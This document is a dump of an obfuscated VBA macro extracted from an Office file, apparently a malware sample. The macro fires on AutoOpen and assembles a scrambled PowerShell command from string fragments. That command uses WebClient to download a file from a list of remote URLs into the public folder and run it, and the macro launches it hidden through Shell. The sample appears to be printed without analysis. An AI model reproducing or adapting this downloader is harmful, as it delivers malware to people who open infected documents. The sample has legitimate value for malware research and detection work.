Filename     : ./macros/8ff51b8a6823376dc08b13467f0382782f77b77f0a8d1fd27bee2a6d854dcdd4
OLE stream   : Macros/VBA/NJKUjoDzJQwwOs
VBA filename : NJKUjoDzJQwwOs.bas
----------------------------------------
Attribute VB_Name = "NJKUjoDzJQwwOs"
Sub AutoOpen()
On Error Resume Next
nZaJBERkf = CkoaL - Sgn(jiYYGflkwiIub) - (8007116 - Tan(1728946) / 4434221 - ChrW(GuIbSC))
fwUUaVVEj = tEWC - Sgn(zHnpKS) - (9216754 - Tan(4518324) / 1674671 - ChrW(CfWhjCSObsal))
LLPddYmil = UAHmUmHjjaL - Sgn(YpwWDEbpuJ) - (7398025 - Tan(2601639) / 9415407 - ChrW(ZhpXkaEPK))
Application.Run "ufjYiBZtoGam", slAjShvwAXAvVM
WathjGsIz = jnaiGViHv - Sgn(LNtpsMZuMqlaI) - (5999848 - Tan(5417748) / 9239826 - ChrW(XujBB))
mnQpzCiBC = IWzIhEp - Sgn(jwvJoGi) - (9040413 - Tan(521078) / 2103183 - ChrW(KMMqJ))
bGZDMXMLn = RmfTOFi - Sgn(CDFdwKKEz) - (4459526 - Tan(7876711) / 8404149 - ChrW(vfph))
End Sub
Function slAjShvwAXAvVM()
On Error Resume Next
avVWqlonuwd = WzqwVjRpqLzYIH - Sgn(vVNtYp) - (3574981 - Tan(4382237) / 458031 - ChrW(QQFaIwS))
rpjfGonm = QjtFhoRAS - Sgn(DPTHHd) - (636942 - Tan(5572790) / 111649 - ChrW(pJDaodFQMOhOhz))
pawpijjLa = aXpnYbXXDSmzI - Sgn(cWfwS) - (7155857 - Tan(1244409) / 5658231 - ChrW(RDjBoDh))
OEiEKqv = qviJwRH + Mid(PPsP + "RshmAtr+0hrcUI+cUItes0hr+0hrt0hr+0hr.magnums'+'pcUI+cUIort.c'+'o0hr+0hrm/k1uT4pcUI+cUI+T4p0hr+0hT4p+T4pr60hr+0hrd0hr+0hrt0hr+0hrw0hr+0hr/?'+'hT4p+T4pt0hr+0hrtp:0hr+0hT4p+T4pr//'+'www.sbktrcUI+cUIavDFbOzait" + twwNsO, 7, 191)
hFKMIbafo = jTWcEdscW - Sgn(qUuTU) - (5687866 - Tan(2015559) / 2999317 - ChrW(ntELfYTJi))
kOBMrjrSvw = ApFnwiSdizA - Sgn(fNi) - (2135071 - Tan(9530870) / 3920305 - ChrW(RTuIJBjfIrElU))
jmEawmkz = sWUljw - Sgn(BAfSZjNqcUa) - (9744276 - Tan(3139112) / 2427335 - ChrW(FjvlRC))
lFqnab = iVPjFNpcYRmzH + Mid(dwH + "uJFmUScliPswwuNYne0hr+0hrxt0hr+0T4p+T4phr(100000hT4p+T4pr+0hr, T4p+T4p2820hr+0hr130hr+0hr30hr+0hr);A9TADCX0hr+0hr = 0hr+0hrO0hr+0hrvGT4p+T4p0hr+0hr'+' 0hr+0hrhttp0hrT'+'4'+'p+T4p+0hr:0hr+0hr//0hZP" + rBRPMlzFYjo, 17, 178)
DkiQr = bRn - Sgn(viirNFGutaAO) - (8950663 - Tan(1889371) / 5159441 - ChrW(wzqp))
LtoJkA = TzOdP - Sgn(YbnLZakVsZXFJ) - (6835245 - Tan(8064443) / 4802010 - ChrW(oRcULvFiazicf))
cKBHhjt = OwJhSGO - Sgn(nKohjYrjG) - (4156348 - Tan(8867136) / 1357839 - ChrW(LnaMjijwc))
YTJjNhzmmG = maLfpnqO + Mid(QXHPTPqj + "hSTMSJpdDmlphr+0hr = 0hr+0hr&(OvGnOvG0hr+0hr+0hr+0'+'hrOvGeO0hT4p+cUI+cUIT4pDDaZZwdBuzZqrJGjFKWpcY" + SojWimE, 14, 63)
XMWGVVkKpG = mXhbKEv - Sgn(dOkjEwb) - (5740641 - Tan(2368701) / 6397899 - ChrW(uiUBtElz))
UtwjFzAzQBw = oMHwR - Sgn(luvmTNlJiR) - (452463 - Tan(2748228) / 7479078 - ChrW(GuhVo))
iVUEMIZb = mRVoXZHjjRHo - Sgn(YMjiZN) - (1685810 - Tan(1875412) / 4937297 - ChrW(krpwmEtfmHd))
idacd = tNFJHzB + Mid(SdOiRjiM + "KlUNwpk4p+T4p(0hr+0hrAT4p+T4p90hr+0cUI+cUIhrT0hrT4p+T4p+0hracUI+cUI0hr+cUI+cUI0hrs'+'fc.0hr+0hrd0hr+0hrQuTocUI+cUIStr0h'+'r+0hrl0hr+0hrGn0hr'+'+0hrilGnNgdQu()0hr+0hr,0hr+0hr T4p+T4pA0wmvEAGFhRiosVDrMGinT" + nurIiYtCKi, 8, 176)
nFjKRV = bKTD - Sgn(wVadq) - (6833425 - Tan(7833374) / 5765050 - ChrW(XibwhonKiS))
qQtjX = VpdpjMkFTkz - Sgn(dVPJKSqrfBGO) - (8055709 - Tan(1148109) / 7567496 - ChrW(ETQbARnHslwdwj))
iZTFCWWzwl = waqzd - Sgn(icrraFT) - (6819191 - Tan(2869523) / 9872008 - ChrW(ZoAzUVnLi))
vAZBfEQbI = TZHPuFBcQKNzOw + Mid(MHHjiMflw + "diNpwrSAYt0hcUI+cUIrv0hr+0T4p+T4phrG-ob0hrT4p+T4'+'p+0hrcUI+cUIjT4p+T4pectO0hr+0hrvG0hr+0hr) System0hr+0hr.NetcUI+cUIT4p+T4pcUI+cUI'+'.'+'WebCl0hr+0hrie0T4p+T4phr'+'+cUI'+'+cUI0hrnt;A0hr+0zUYpMXdiNzFfKRUpFXooKIkLib" + bUfnmUhmds, 11, 178)
htnZHlstTw = uKMDVfhJdZa - Sgn(SPKaJvlOwPkonA) - (1596405 - Tan(6653524) / 2556958 - ChrW(ijwVPTNnDF))
fbiPDIL = DqwClCoAIBjTo - Sgn(faXPUWzvzrrD) - (9491204 - Tan(9987032) / 8210165 - ChrW(VrjVv))
POYVc = lmBzTiEd - Sgn(PIh) - (6933333 - Tan(8780032) / 8037410 - ChrW(iitHsHLi))
mzwvBdVZSb = RZWMtwqK + Mid(zIKdaqYkZMTX + "ESpTLMozBhTstmWRhrT4p+T4pqVT4p+T4pU0hr,[ChAR]92 -cREPlacE  0h'+'rdQu'+'0hr,[cUI+cUIChAR]34 -cREPlacE 0hrlGn0hcUI+cUIrT4p+T4'+'p,[T4p+T4pChAR]96  -'+'rEPLAoI" + lVEKiLbEC, 17, 138)
pQjjBJW = jiaTriZIzNcp - Sgn(dFDKLicQZSkn) - (8111657 - Tan(4822579) / 2360584 - ChrW(jfppDZKL))
PDoMHvEts = fYrjWcwFZlrSm - Sgn(TAXHMpfBFNiOhn) - (9984759 - Tan(7346531) / 845549 - ChrW(sQfFlhCplhQnU))
dIbwl = whVp - Sgn(SwVOdTiAIu) - (2261033 - Tan(1085317) / 7538788 - ChrW(zaWSNOqEWE))
oicJdzE = oJwjonS + Mid(GolNXDQrTpbvP + "IFahchfZMDToBod[string]'+'[cHAR]39).RePl'+'acE(([cHAR]9'+'9+[cHAR]1'+'01+[cHAR]90),[string][cHAR]36) yZv & ( YcOPshoMe[4]+YcOpsHoMe[30]+T4pxT4p)cUI).RePLAce(([cHar]84+[cHar]52+[cHar]112),[str'+'iNG][cHar]dEVNrPFYwB" + zWzJwc, 16, 189)
ziMnYmuF = sBlZqt - Sgn(vjvBDURbHKJai) - (4122998 - Tan(1417276) / 2447244 - ChrW(vrmIkRYU))
lZYTnw = kIkV - Sgn(DCfh) - (9352008 - Tan(1991095) / 4188125 - ChrW(FzjSiDBmv))
LAJKpqATwRd = oPizGlKPWjw - Sgn(IqlDGYzoKCA) - (3574020 - Tan(7320609) / 7985719 - ChrW(RmVSSoXwG))
fiwoz = kSsbRARKGmwWBB + Mid(HjuvZcdFWja + "BXmwBCmuNzmawbSIRdZar]39 -CrePlaCe  'QOU',[char]36)| .((GV '*mDr*').naMe[3,11,2]-JoIN'')mwwoAo" + IapNcR, 20, 69)
laHmUGjjfb = lufaBcFRdOLoR - Sgn(mkL) - (4646204 - Tan(8021066) / 6086462 - ChrW(wJqRqikcDn))
ZNJSaTHs = wZDvBBvAh - Sgn(wYEXwQXIScYz) - (2653231 - Tan(7903475) / 7002025 - ChrW(IKwVoaakprzq))
isXLWRpE = JcpwszlmuuO - Sgn(UkKCz) - (2223757 - Tan(2695714) / 2175267 - ChrW(skBMA))
avjqiDQYoY = EvtWjooiUoq + Mid(bzdnHamPLN + "oBcoLbVRnv0hr+0hrT4p+T4p:p0hr+0hrubl0T4p+T4phr+0hric +0hr+0hr OvGqV0hr+0hrUOvT4p+T4p0hr+0hrG +'+'0hr+0hr 0hrT4p+T4p+0'+'hrA90hr+0hrT0hr+0'+'hrNSBT4p+T4p0hr+0hr + (Ov'+'G0hr+0cUI+cUIhrsiwUbIhOVZoVtZ" + JtdAOf, 9, 175)
ftfPYw = UpPh - Sgn(jjfXRrnlrdoR) - (2495446 - Tan(8180893) / 9163273 - ChrW(ucKTzpYMIi))
HwJjzuTqk = RDfjhmr - Sgn(iBBrIvPi) - (2401363 - Tan(1868895) / 7144931 - ChrW(Zoc))
DJrvrZM = NEOtqLSP - Sgn(WWiLwHfVSNd) - (8774191 - Tan(7090221) / 457178 - ChrW(hLLDXdvc))
JQKjiJDzOm = zUhEShZIAi + Mid(Vpw + "JrnPVujGlPmlMQnzuSOOumYuhcUI+cUIr+0T4p+T4phr/spocUI+cUI0hr+0hrrt0hr+0hrid0hr+'+'0hr.0cUI+cUIhr+0hrn0hr+cUI+cUI0hret0hr+0hr/02wdi0hr+0hr/OvG.SplASAQFckWnIpqYnm" + NPk, 25, 119)
UqRnIRrY = iHXlquHfQ - Sgn(AtvASwoAcaraim) - (516395 - Tan(4498471) / 4017380 - ChrW(wLiaNmYzHVlEY))
FzMKlSkDw = mqLlDOZJltifmE - Sgn(liSZMjEU) - (4943421 - Tan(6136930) / 1720835 - ChrW(UrTPXBuor))
moWnRUHQG = RTGVmZlvh - Sgn(UYV) - (7508605 - Tan(3621820) / 6033660 - ChrW(NhWlF))
ZXEfdwizsqn = GTcYzhXjmFm + Mid(hSPCFfGb + "wQzdhnSqcOUv0hr+0hrit(0hr+0hrOvG?0hr+0hrqbtziZYZc" + jcCqLizOrIatHF, 13, 28)
IRQcvGDqh = DJEqKVTMUQCn - Sgn(HmdJ) - (9324015 - Tan(7347901) / 6534304 - ChrW(oKINVG))
UtdmZb = wccYbpuwD - Sgn(LKcf) - (4096894 - Tan(3151951) / 930222 - ChrW(hDmqFXUZaP))
aBYfSX = vcoPtOrndMSNnZ - Sgn(lbF) - (6631950 - Tan(3707311) / 8883841 - ChrW(joC))
AAkMOKV = lFSSiGirPiKRzS + Mid(wfiiwIIvVjwsp + "jFhrv0hT4p+'+'T4'+'pr+0hroOv0hr+0hrG0hr+0T4p+T4phr+OvGkO0hr+0hrvG+Ov0'+'hr+'+'0hrGe-ItemOvG0hr+0hr)(A0hr+0hr90hr+0hrTSDC)0hr+0hr;br0h'+'r+0hreak0hr+0hrT4p+T4p;0hr+0hr}catc0'+'hr+iMmSwkzSC" + GUpLYUPUHH, 3, 176)
QCAcEBwIAF = iaKDinR - Sgn(PjWRpRdLZ) - (2375814 - Tan(8064544) / 8062839 - ChrW(SKiWjvR))
XfzBrX = VidJItAKKH - Sgn(AaXNz) - (5138378 - Tan(1184475) / 7445550 - ChrW(laAPRA))
fQVYOUpcz = Qchzsz - Sgn(tzsHhYcAPEfpu) - (9141603 - Tan(9410163) / 7032576 - ChrW(cIDuviNrIdkidI))
rbOXUQ = HWFDBOfAIcWvi + Mid(dcbVOq + "pXUclTZ0cUI+cUIhrh{0hT4p'+'+T4pr+cUI+cUI0hr}}0hr) -cREPlacET4p+T4p  T4cUI+cUIp+T4p'+'0MwazSaIMNwMJVMosO" + RBmtTsvErwAMFH, 8, 79)
jmkLBaNNdJn = hjcEuRJ - Sgn(miQCIRqsmiD) - (5893787 - Tan(6091322) / 74662 - ChrW(DzTuTazV))
iQbEfr = pClLISpfrOd - Sgn(zWm) - (4867363 - Tan(5222173) / 8753293 - ChrW(flklj))
rJfZzpZA = ZFaW - Sgn(JmIdMFffjUtY) - (7522846 - Tan(3264176) / 4473823 - ChrW(DchVsjqq))
EpwFjbwX = AfdPESYOm + Mid(LvjbFUTrlWj + "w.0hr+0hre0hr+0hrxOTQqFKpcGwiBWKj" + AwPiPZurRlvNpP, 2, 19)
ZjMQJdww = MzUJhWctAzc - Sgn(SdHoaaAHiPlLjj) - (6534361 - Tan(3477551) / 175704 - ChrW(wWADoHwvX))
znfVC = kUIEc - Sgn(asCrSWJiHwMJd) - (301997 - Tan(7707661) / 2083215 - ChrW(YAGvOoAsfCnXK))
VDapDDAdPfD = jjlG - Sgn(PJJaNRvrumSV) - (4750496 - Tan(4842747) / 5376673 - ChrW(EVwLDCwnTVL))
kVcaCJ = FRFFiMO + Mid(CFqsV + "AAzthhVlImwJOvG)cUI+cUI;A9TS0hr+0hrDC0hcUI+cUIr+0hr =0hT4p+T4pr+0hr 0hr+0cUI+cUIhrA0hr+0hr9T0hr+0hre0hr+0hrzj" + jtwKp, 13, 95)
wVBWZ = ONa - Sgn(ZdsVdcUtG) - (9347233 - Tan(8629086) / 5051716 - ChrW(GNPSELEBNiY))
bkNmAnP = TBYUvrslHpUpC - Sgn(lSBfQRwVlsijJB) - (4318142 - Tan(4764809) / 2425795 - ChrW(TdKawYKEAoiRtZ))
ZKLUKza = GamAiR - Sgn(vwQj) - (7192395 - Tan(2280993) / 6615248 - ChrW(PicYWYnKVcULR))
zmLkFjNwKw = pjZrvwvjOatiSz + Mid(FMhP + "NwCmce 0hrcUI+cUIOvG0T'+'4p+T4phr,[ChAR]39 -rT4p+TcUI+cUI4pEPcUI+cUILAce  ([ChAR]65cUI+cUI+[ChAR]57+[ChAR]'+'84),[ChAR]36)cUI+c'+'UI ) czzOLLcsw" + iXbNmulNKWHrFw, 5, 132)
zcYcj = nHwhcsjQfJwt - Sgn(qaAFp) - (4129904 - Tan(7901046) / 1773560 - ChrW(ufcFciLTBQY))
pQjtViJhOtJ = uFOiLGqr - Sgn(mqbtAsPKisQjE) - (2404980 - Tan(3162816) / 877822 - ChrW(PzFLIhUn))
tmamcKTRVZQ = VmXdOwRpIpBLbq - Sgn(JSYIppszioqtli) - (5702604 - Tan(1613542) / 1335753 - ChrW(DWcn))
Ziizij = qUwJTCak + Mid(iiMhMKQn + "JwcEiRTPJzppDhs0hru0hr+0hrT4p+T4pDolcUI+cUIG0hr+0hrnWnllGnO0hr+0hr'+'a0hcUI+cUIr+0hrdFcUI+c'+'UIIl0'+'hr+0hrGn0hr+0hrlT4p+T4'+'pedQuTaqEiZinAlkoLihzE" + WIYwoVDrTPQXNF, 16, 118)
wouObQ = pXFjHihuFXTTW - Sgn(uqbaoW) - (5130758 - Tan(5783729) / 535044 - ChrW(bjnwuJwunuP))
KvdRtlwa = MiIZ - Sgn(JFQnqfbPWWhoS) - (3524691 - Tan(2147294) / 4039779 - ChrW(Eaqizvb))
EIojdicYrt = fbzodsSP - Sgn(RYmzlAMjX) - (7539124 - Tan(2916721) / 1176977 - ChrW(cDkuihi))
cRRId = dSOPEaD + Mid(oGJBp + "HOSb4p+T4p0hr+0hrvG+0hr+0hrOvGeOvcUI+cUIG)0hr+0hr;0hr+0hrfo0hr+0hrre0hr+0hrach(A90hr+0hrTasfc0hr+0hr i0hr+0hT4p+T4prn A90hr+0hrTADCX){try{A9TY0hr+0hrcUI+'+'cUIYU.d0hr+cUI+cUI0hrQ0hrc'+'UI+cUI+AiSpozftjlZBDsRTNz" + MzHco, 5, 188)
mRkQc = DiNkhRIOzkbwk - Sgn(iJzh) - (6138455 - Tan(5221482) / 3320933 - ChrW(aMH))
QFkcUwRJ = LjB - Sgn(vzEjXKQir) - (4539562 - Tan(8596356) / 4610906 - ChrW(irdtrzzMliY))
qfVOiGZCa = BIBcdGbNU - Sgn(bsEkUtVqIitR) - (8436155 - Tan(3943880) / 5815841 - ChrW(UjCQJ))
kOtQi = JJoOKEbb + Mid(dPYpAmiTSZizc + "DofFDzmXmjmwbHdr+0hrvG+0hr+0cUI+cUIhrOv0T4p+T4phr+0hrG0hcUI+cUIr+T4p+T4p0hrw-obje'+'0hT4p+T4pr+0hrc0hr+'+'0hrO0hr+0hrvG+O0hr+0hrvG0hr+0hrt0hr+0hrOvG) r0hr+0hrando0hr+0hrm;A9TYYU 0hr+0hr=0hr+0'+'hr .0cUI+cUIhr+0hr(buvrDKErQhX" + MTKz, 16, 198)
zHjicDNMZZt = jQhwSmsLEfF - Sgn(CNRfT) - (5521741 - Tan(8235153) / 3258207 - ChrW(BwEtVMFwZOw))
dpcwz = RnlhDvfZzLNK - Sgn(mtLaXSfZ) - (420654 - Tan(6572882) / 3435601 - ChrW(FwZnOfQGW))
Llzaki = ajwQhLrjqkt - Sgn(jStVBwT) - (3178266 - Tan(2885502) / 936738 - ChrW(DzwFmkf))
AMOKs = fCWCOBNRRK + Mid(tQloHd + "aRFDQZMhr+0hr90hr+T'+'4p+T4p0hrTSDC);&(T4p+T4pO0hr+0hrvGIT4p+T4pn0hr+0PiKjQ" + ruWq, 8, 63)
Ijoiq = MziwMmUMkzsrB - Sgn(QvizSioBO) - (5436519 - Tan(3792435) / 6508733 - ChrW(uRfHjzkHnXZIZ))
YboSV = FwGMHILZ - Sgn(DBuKEKkG) - (5490474 - Tan(5948532) / 8848115 - ChrW(vFrMrRVcY))
MaQvRKzulP = ptIj - Sgn(IPM) - (4855739 - Tan(6478728) / 4053312 - ChrW(bGlpfwDQzdfzK))
qBLcwkdohAD = DBBTfcHkUhSsjj + Mid(NGttiTnGWVM + "opFosSltlnBHipUrrAmbwRETShr9TNSB =0hr+0hr A9TT4p+T4p0hr+0hrn0hr+0hT4p+T4prsad0'+'hr+0hras0hT4p+T4pr+0hrd.0hr+0hrjQHiPM" + SjFFzKopTizNt, 26, 87)
RdfPqltFs = HLNJ - Sgn(KtOwhrYu) - (5674697 - Tan(8865561) / 6952231 - ChrW(KpaZjYTuJOda))
aJzRqzu = FRWsqB - Sgn(swzjcUXUjGAq) - (8107323 - Tan(2922872) / 5299202 - ChrW(ziamtOPvPni))
VsBjaCddWp = aBBmtvuNr - Sgn(wMAwOCOnkwii) - (4568285 - Tan(1972723) / 3113395 - ChrW(uihBUp))
QjmCUzhNF = PAPrpwzwMBBVH + Mid(rQFMFBdla + "oWQsMzuGaDLNhA39).RePLAce(cUIyZvcUI,[striNG][cHar]124).RePLAce(([cHar]89+[cHar]99+[cHar]79),cUIQOUcUI)Enf.((gV cUI*mdR*cUI).NaME[3,11,2]-JoincUIcUI)')  -RePLAcE 'Enf',[char]124 -CrePlaCe  'cUI',[chOdtJjf" + lYZ, 15, 183)
iSTDP = rWiBQjqWH - Sgn(EEjzApqdP) - (8294064 - Tan(2948769) / 4732749 - ChrW(bzd))
MRBPVwIQYGF = TslAzCA - Sgn(rSsDhA) - (7357345 - Tan(5825806) / 7399968 - ChrW(qRQjmNGiAO))
IYFYSSSupR = UDBnMWd - Sgn(aHCijJWz) - (4959371 - Tan(6541050) / 8153228 - ChrW(uPtJMDmFY))
zXOFBtWz = vuiFNzuUOrIl + Mid(muANhc + "UYADCQbmiUI+cUIT4p).RePlacE(T4p0'+'hrT4pcUI+cUI,RtwMzluKJzJwmq" + kzr, 10, 39)
pcFpmIdJocB = MMUlD - Sgn(ViWPoIN) - (3017095 - Tan(8349242) / 96067 - ChrW(SFzqMuk))
FhbjFfBrPV = fjnlq - Sgn(KKYnzRnAqWw) - (7393845 - Tan(3964978) / 6753825 - ChrW(TbJwUTAGSASj))
zfirzKkKKus = Xjisjiiwp - Sgn(tjiSOctZZ) - (290190 - Tan(4275859) / 2438039 - ChrW(ipWR))
JvmAfGi = PBmuWPrQVdIIMa + Mid(ijXQQhzKlYEJ + "ZPSHOme[30T4'+'p+T4p]cUI+cUI+0hrX0'+'hr)(cUI+cUI ((0hrA0hr+0hr9T0hr+0hrn0hr+0hrsadasd0hTEkOEtzFnRH" + aJjYzjrAwpmGF, 2, 86)
XzjSP = NVujp - Sgn(CVpHpq) - (3683464 - Tan(6772791) / 9459978 - ChrW(iIOckPXZjL))
EpKEDMwhm = wIRfjAwciwu - Sgn(BKQLi) - (7808874 - Tan(6669332) / 1533574 - ChrW(lYcTp))
OoPoNGIBDKH = YzwUDibDN - Sgn(cFpWGOio) - (9759094 - Tan(2507997) / 3442477 - ChrW(DslzDdN))
nzOvwc = DFmfhMcH + Mid(DGqEqizPMlBm + " DYoIupKe0hr+0hrcUI+cUIT4p+T4pl.com.T4p+T4p0hr+0hrmy0hr+0hr/MoG0hr+0hrJ0hr+0hrD/0hr+0hr?0hr'+'+0hrhttp0hr+0hr://d0hr+0'+'hror0hr+0hrsc0hr+0hrhd0hr+0hri.co0hr+0hrlNjwQOthSpp" + YbsiELcED, 9, 153)
YfXdnPuww = wpikQKPzb - Sgn(HwTmKSQqBE) - (3405054 - Tan(4941532) / 8329781 - ChrW(zqSRUkislEcSY))
KDqaSwl = kZd - Sgn(csirBpwliPhA) - (1750580 - Tan(4706190) / 9590347 - ChrW(kaswdqAOLPK))
NPZrQ = tNFcbdzzKIpcS - Sgn(GOLlvDUnSK) - (6367680 - Tan(5970138) / 2022826 - ChrW(rUjmfGsQJEZ))
OFXlsZuJI = oLuZYikbrfaH + Mid(nBj + "ZjImZJMOv0hr+0hrGnecUI+cUIOvG0hr+0hT4p+T4pr+O0hr+0T4p+T4phrvG0hr+0hrw0hr+0hrO0hrT4p+T4p+0hrvG+O0hr+l EbviL" + lDWpoUcIDuFjF, 8, 92)
kwWjZw = qpFGL - Sgn(dVNqZR) - (9921963 - Tan(3028439) / 248570 - ChrW(RGSY))
KijqauA = mWOJdMOrkAi - Sgn(TEujvOD) - (5653448 - Tan(225062) / 8400364 - ChrW(Wdw))
whaGzQcdIQ = LBX - Sgn(kYcDTqz) - (6687075 - Tan(742624) / 2808698 - ChrW(dpqzjLGZWs))
bQicMDTzT = awaclPfuklC + Mid(TGXFuvvwT + "otHlCm/0hr+0hrly4'+'0hrcUI+cUI+0hrIv/T4p+T4p0hr+0hr?h'+'0hr+0hrt0hr+0hrtp://0hr+0hrwww0hr+0'+'hr.hoT4p+T4pp0hr'+'+T4p+T4p0hradicUI+cUIlid0hr'+'+0hcUI+cUIra.ro/00hr+0hrLCTG2/?http:/0uMtRzqEnL" + HpbCz, 6, 176)
PfNDkp = cVc - Sgn(IAwSCvLpRJrFp) - (2118813 - Tan(6126541) / 7036773 - ChrW(MOjMjEMB))
cHbwhIJiM = QzNKDd - Sgn(wraqfc) - (908523 - Tan(686517) / 6311900 - ChrW(EnYahYrdPGvicv))
klDXDAjFlO = RmiLbGGOotT - Sgn(tsjK) - (5620166 - Tan(6017404) / 6906125 - ChrW(Ycp))
VulcHTnlUTW = viuSsfjID + Mid(MjwtqAbpzfzO + "zhnNiKnYWKs((' (cUI(T4p .( ceZPshOme[4]+ceZicEpXGZvTX" + OOfiQsEb, 12, 32)
slAjShvwAXAvVM = WifsuuN + bWhoWVNPfENq + PZXwMXqaG + ChrW(34) + rFqwZjjNTzk + VulcHTnlUTW + JvmAfGi + YTJjNhzmmG + kOtQi + OFXlsZuJI + vAZBfEQbI + qBLcwkdohAD + lFqnab + OEiEKqv + nzOvwc + bQicMDTzT + JQKjiJDzOm + ZXEfdwizsqn + kVcaCJ + avjqiDQYoY + EpwFjbwX + cRRId + Ziizij + idacd + AMOKs + AAkMOKV + rbOXUQ + mzwvBdVZSb + zmLkFjNwKw + zXOFBtWz + oicJdzE + QjmCUzhNF + fiwoz
fwSDsvNpz = kEZSsTjEZpftj - Sgn(ZtCzsIWHZwI) - (4936120 - Tan(506611) / 2072082 - ChrW(jrYtiGAR))
jjQAJtHFm = hdwsN - Sgn(oZcicJSQVjpzGA) - (973132 - Tan(5905214) / 4815529 - ChrW(WTcIMOSrW))
MVhYricFF = WoWNzfcDK - Sgn(mHCEWWtTfMNMln) - (1115178 - Tan(9067572) / 7614634 - ChrW(wTiu))
End Function
Sub ufjYiBZtoGam(dLkHzXAmafu As String)
On Error Resume Next
aflHJmkVW = sPjwHclKnEwH - Sgn(sIXoWw) - (2212331 - Tan(4196861) / 1266086 - ChrW(mnawTsRVHbVS))
pQbhPUlsk = TQszlzNZLSl - Sgn(wIhjSSVj) - (8258417 - Tan(6214547) / 8715466 - ChrW(SGNohqkOF))
DUJDTGUHh = CjRUSA - Sgn(CTWBsmWSjij) - (4824736 - Tan(8594386) / 3960118 - ChrW(XStnXcwLBb))
Shell dLkHzXAmafu, 0
JQqtBmunw = RrELinlnbkio - Sgn(UJwafdFDHUaiWj) - (4740228 - Tan(6048014) / 8460243 - ChrW(lujQfOhFkrLj))
RtUUVkCMP = slJXd - Sgn(LGMHjwzuP) - (731499 - Tan(5696931) / 6988482 - ChrW(atNrYDhOCKocf))
ZbBuHIkFt = fEzVvaESG - Sgn(ToQitlT) - (9376079 - Tan(2780561) / 1757536 - ChrW(YiDWWsUwVznjQi))
End Sub
